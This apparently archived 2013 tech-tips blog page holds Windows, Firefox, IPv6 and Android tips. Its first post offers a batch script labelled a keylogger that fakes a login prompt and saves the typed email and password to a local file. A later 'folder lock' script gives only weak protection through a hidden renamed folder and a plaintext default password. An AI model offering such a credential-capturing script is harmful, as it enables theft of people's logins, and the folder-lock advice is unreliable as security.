Monday, May 27, 2013

How to: make a simple keylogger in notepad

How to: make a simple keylogger in notepad

Ajay.E

WARNING !!!!!!!!!!!!!
        I am not responsible for any trouble you may get into with this. For educational purposes only. The code we will be using is a simple Batch code.Pastebin makes it easy to give codes to people.

1.) Now paste that into Notepad and save it as a Logger.bat file.
2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
3.) Drag that folder in to the C:\
4.) Test out the Logger.bat!
5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

Keylogger Code

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >Log.txt
    start >>Program Here<<
    exit
     
    RAW Paste Data  

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >Log.txt
    start >>Program Here<<
    exit

 


Friday, May 24, 2013

How does Windows tune your LCD for top text legibility?

Let Windows tune your LCD for top text legibility

Ajay.E

        Windows 7 is the first Windows OS for which, at its introduction, LCD monitors have truly been the overwhelming display standard. (They were well on their way at the time of Vista’s introduction, but the trend has accelerated with the ascendancy of laptops and the wholesale move to LCDs on desktop PCs.) The new OS includes a dedicated LCD-tweaking wizard that lets you improve the look of text on your screen. It’s called the ClearType Text Tuner (CTTT).
    You access CTTT from the Windows Control Panel; click on the Display item, and, in the resulting dialog, click on Adjust ClearType text. That will launch the wizard. Make sure on the first screen that the box next to Turn on ClearType is checked, and follow the prompts. Windows 7 will first check that your monitor or monitors are running at their native resolutions. (Native resolution generally delivers the best possible text legibility.) Then, it will take you through some comparisons reminiscent of a vision test at the eye doctor. The wizard runs a series of visual tests, asking you which block of text looks clearer to you, like this:
 
16-Tune-your-LCD

       When you’re done, chances are you’ll see a noticeable difference in text quality. After you’ve run CTTT, you may wish to return to the Display Control Panel and tweak the size of default Windows text. Under the subhead Make it easier to read what’s on your screen, try tweaking the setting from Smaller to Medium or Larger if that’s more comfortable for you. If you do indeed decide to change the default text size, however, we recommend running CTTT again so your screen is optimized for the new size.

How to Pin frequently used files or folders to taskbar program icons


Pin frequently used files or folders to taskbar program icons (Jump Lists) 

Ajay.E 

      Windows 7’s taskbar rethink means that a large number of the tips and tweaks here involve this thin bit of real estate, but here’s another taskbar-related tidbit that’s nonetheless invaluable. It’s been possible to set up shortcuts to frequently used files or folders on the Windows Desktop for ages, of course, but accessing them requires minimizing or otherwise moving around windows to uncover them. Windows 7, however, allows you to “pin” files or folders you use often onto relevant program icons in the taskbar for easy access, always keeping them above the desktop-window fray.
For example, say you often work with a spreadsheet file called “TAXES.XLS” in Excel. Launch Excel, then find the file “TAXES.XLS.” Left-click or right-click on the file itself, then drag it onto the Excel taskbar program icon. You should see a message to “Pin to Microsoft Excel”; when you do, release the mouse button.
The file will be added to what Windows 7 calls a Jump List, a list of frequently accessed files, folders, and actions that you can get to right from the taskbar via the program’s icon. Here's a sample Jump List for Microsoft Word:

13-Pin-to-Jump-Lists

For a Jump List to be at hand, the program needs to have been launched, however—or its icon permanently pinned to the taskbar

Thursday, May 16, 2013

How To Shutting down Windows 8 Quick and Easy



Shutting down Windows 8 Quick and Easy

Ajay.E

        To shut Windows 8 down, just move the mouse cursor to the bottom right corner of the screen, click the Settings icon - or just hold down the Windows key and press I - and you'll see a power button. Click this and choose 'Shut Down' or 'Restart'.
50 Windows 8 tips, tricks and secrets      Some of the tricks available in previous versions of Windows still apply. Press Ctrl+Alt+Del, for instance, click the power button in the bottom right-hand corner and you'll be presented with the same 'Shut Down' and 'Restart' options.
        And if you're on the desktop, press Alt+F4 and you'll be able to choose 'Shut Down', 'Restart', 'Sign Out' or 'Switch User' options.

Tuesday, May 14, 2013

How to switch your default printer automatically?

Automatically switch your default printer
Ajay.E


   Windows 7's location-aware printing allows the operating system to automatically switch your default printer as you move from one network to another.
     To set this up, first click Start, type Devices, and click the Devices and Printers link.
     Select a printer and click Manage Default Printers (this is only visible on a mobile device, like a laptop - you won't see it on a PC).
    Choose the "Change my default printer when I change networks" option, select a network, the default printer you'd like to use, and click Add.
      Repeat the process for other networks available, and pick a default printer for each one.
     And now, as you connect to a new network, Windows 7 will check this list and set the default printer to the one that you've defined.

Monday, May 13, 2013

YOU CAN USE YOUR MOBILE CAM (ANDROID) AS CCTV

YOU CAN USE YOUR MOBILE CAM (ANDROID) AS CCTV
AJAY.E

     Today most of us use CCTV/IP Cam to protect our establishments from thief's. But it is very expensive. the cheapest way is that use your android as CCTV. download "IP WEBCAM" from Google Play Store and install it in your mobile. then use it and relaxxxxxxxxxxxxxx!!!!!!!!!!!
 .

Friday, May 10, 2013

Password Protect Any Folder Without Any Software



Password Protect Any Folder Without Any Software

 Ajay.E

 

 

 

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

    How To Further Secure ?

    You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

 

 

 

Tuesday, May 7, 2013

COMPUTER TIPS and TRICKS: Mozilla Firefox shortcut keys

COMPUTER TIPS and TRICKS: Mozilla Firefox shortcut keys: Mozilla Firefox shortcut keys Ajay.E     Below is a listing of all the major shortcut keys in Mozilla Firefox. Sh...

COMPUTER TIPS and TRICKS: Mozilla Firefox shortcut keys

COMPUTER TIPS and TRICKS: Mozilla Firefox shortcut keys: Mozilla Firefox shortcut keys Ajay.E     Below is a listing of all the major shortcut keys in Mozilla Firefox. Sh...

Mozilla Firefox shortcut keys

Mozilla Firefox shortcut keys

Ajay.E

    Below is a listing of all the major shortcut keys in Mozilla Firefox.
Shortcut Keys Description
Alt + Home Open your Home page.
Alt + Left Arrow Back a page.
Alt + Right Arrow Forward a page.
F5 Refresh current page, frame, or tab.
F11 Display the current website in full screen mode. Pressing F11 again will exit this mode.
Esc Stop page or download from loading.
Ctrl + (- or +) Increase or decrease the font size, pressing '-' will decrease and '+' will increase. Ctrl + 0 will reset back to default.
Ctrl + Enter Quickly complete an address. For example, type google in the address bar and press CTRL + ENTER to get http://google.com/
Ctrl + Shift + Del Open the Clear Data window to quickly clear private data.
Ctrl + D Add a bookmark for the page currently opened.
Ctrl + I Display available bookmarks.
Ctrl + J Display the download window.
Ctrl + K or Ctrl + E Move the cursor to the search box.
Ctrl + N Open New browser window.
Ctrl + P Print current page or frame.
Ctrl + T Opens a new tab.
Ctrl + F4 or Ctrl + W Closes the currently selected tab.
Ctrl + Shift + T Undo the close of a window.
Ctrl + Tab Moves through each of the open tabs.
Spacebar Moves down a page at a time.
Shift + Spacebar Moves up a page at a time.
Alt + Down arrow Display all previous text entered in a text box and available options on drop down menu.

Monday, May 6, 2013

IP v 6 Address (Version 6)



IP v 6 Address (Version 6)
Ajay.E


Internet Protocol version 6 (IPv6) is the latest revision of the Internet Protocol (IP), the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet. IPv6 was developed by the IETF (Internet Engineering Task Force) to deal with the long-anticipated problem of IPv4 address exhaustion.
IPv6 is intended to replace IPv4, which still carries the vast majority of Internet traffic as of 2013. As of late November 2012, IPv6 traffic share was reported to be approaching 1%.
Every device on the Internet must be assigned an IP address in order to communicate with other devices. With the ever-increasing number of new devices being connected to the Internet, the need arose for more addresses than IPv4 is able to accommodate. IPv6 uses a 128-bit address, allowing 2128, or approximately 3.4×1038 addresses, or more than 7.9×1028 times as many as IPv4, which uses 32-bit addresses. IPv4 allows only approximately 4.3 billion addresses. The two protocols are not designed to be interoperable, complicating the transition to IPv6.
IPv6 addresses are represented as eight groups of four hexadecimal digits separated by colons, for example 2001:0db8:85a3:0042:1000:8a2e:0370:7334, but methods of abbreviation of this full notation exist.
Technical Overview
IPv6 is an Internet Layer protocol for packet-switched internetworking and provides end-to-end datagram transmission across multiple IP networks, closely adhering to the design principles developed in the previous version of the protocol, Internet Protocol Version 4 (IPv4). IPv6 was first formally described in Internet standard document RFC 2460, published in December 1998. In addition to offering more addresses, IPv6 also implements features not present in IPv4. It simplifies aspects of address assignment (stateless address auto configuration) network renumbering and router announcements when changing network connectivity providers. It simplifies processing of packets by routers by placing the need for packet fragmentation into the end points.   
The IPv6 subnet size is standardized by fixing the size of the host identifier portion of an address to 64 bits to facilitate an automatic mechanism for forming the host identifier from link layer addressing information (MAC address). Network security was a design requirement of the IPv6 architecture, and included the original specification of IP sec.
IPv6 does not specify interoperability features with IPv4, but essentially creates a parallel, independent network. Exchanging traffic between the two networks requires translator gateways or other transition technologies, such as the tunneling protocols 6to4, 6in4, and Teredo.

Friday, May 3, 2013

How To Enable Search privacy option in Windows 7

Search privacy


 Ajay,E

      By default Windows 7 will remember your PC search queries, and display the most recent examples when searching in Windows Explorer. If you're sharing a PC and don't want everyone to see your searches, then launch GPEDIT.MSC, go to User Configuration > Administrative Templates > Windows Components > Windows Explorer, double-click "Turn off display of recent search entries..." and click Enabled > OK.

How to Take Control Your KID's User Account

Take control
Ajay.E
     

         Tired of the kids installing dubious software or running applications you'd rather they left alone? AppLocker is a new Windows 7 feature that ensures users can only run the programs you specify. Don't worry, that's easier to set up than it sounds: you can create a rule to allow everything signed by a particular publisher, so choose Microsoft, say, and that one rule will let you run all signed Microsoft applications. Launch GPEDIT.MSC and go to Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker to get a feel for how this works.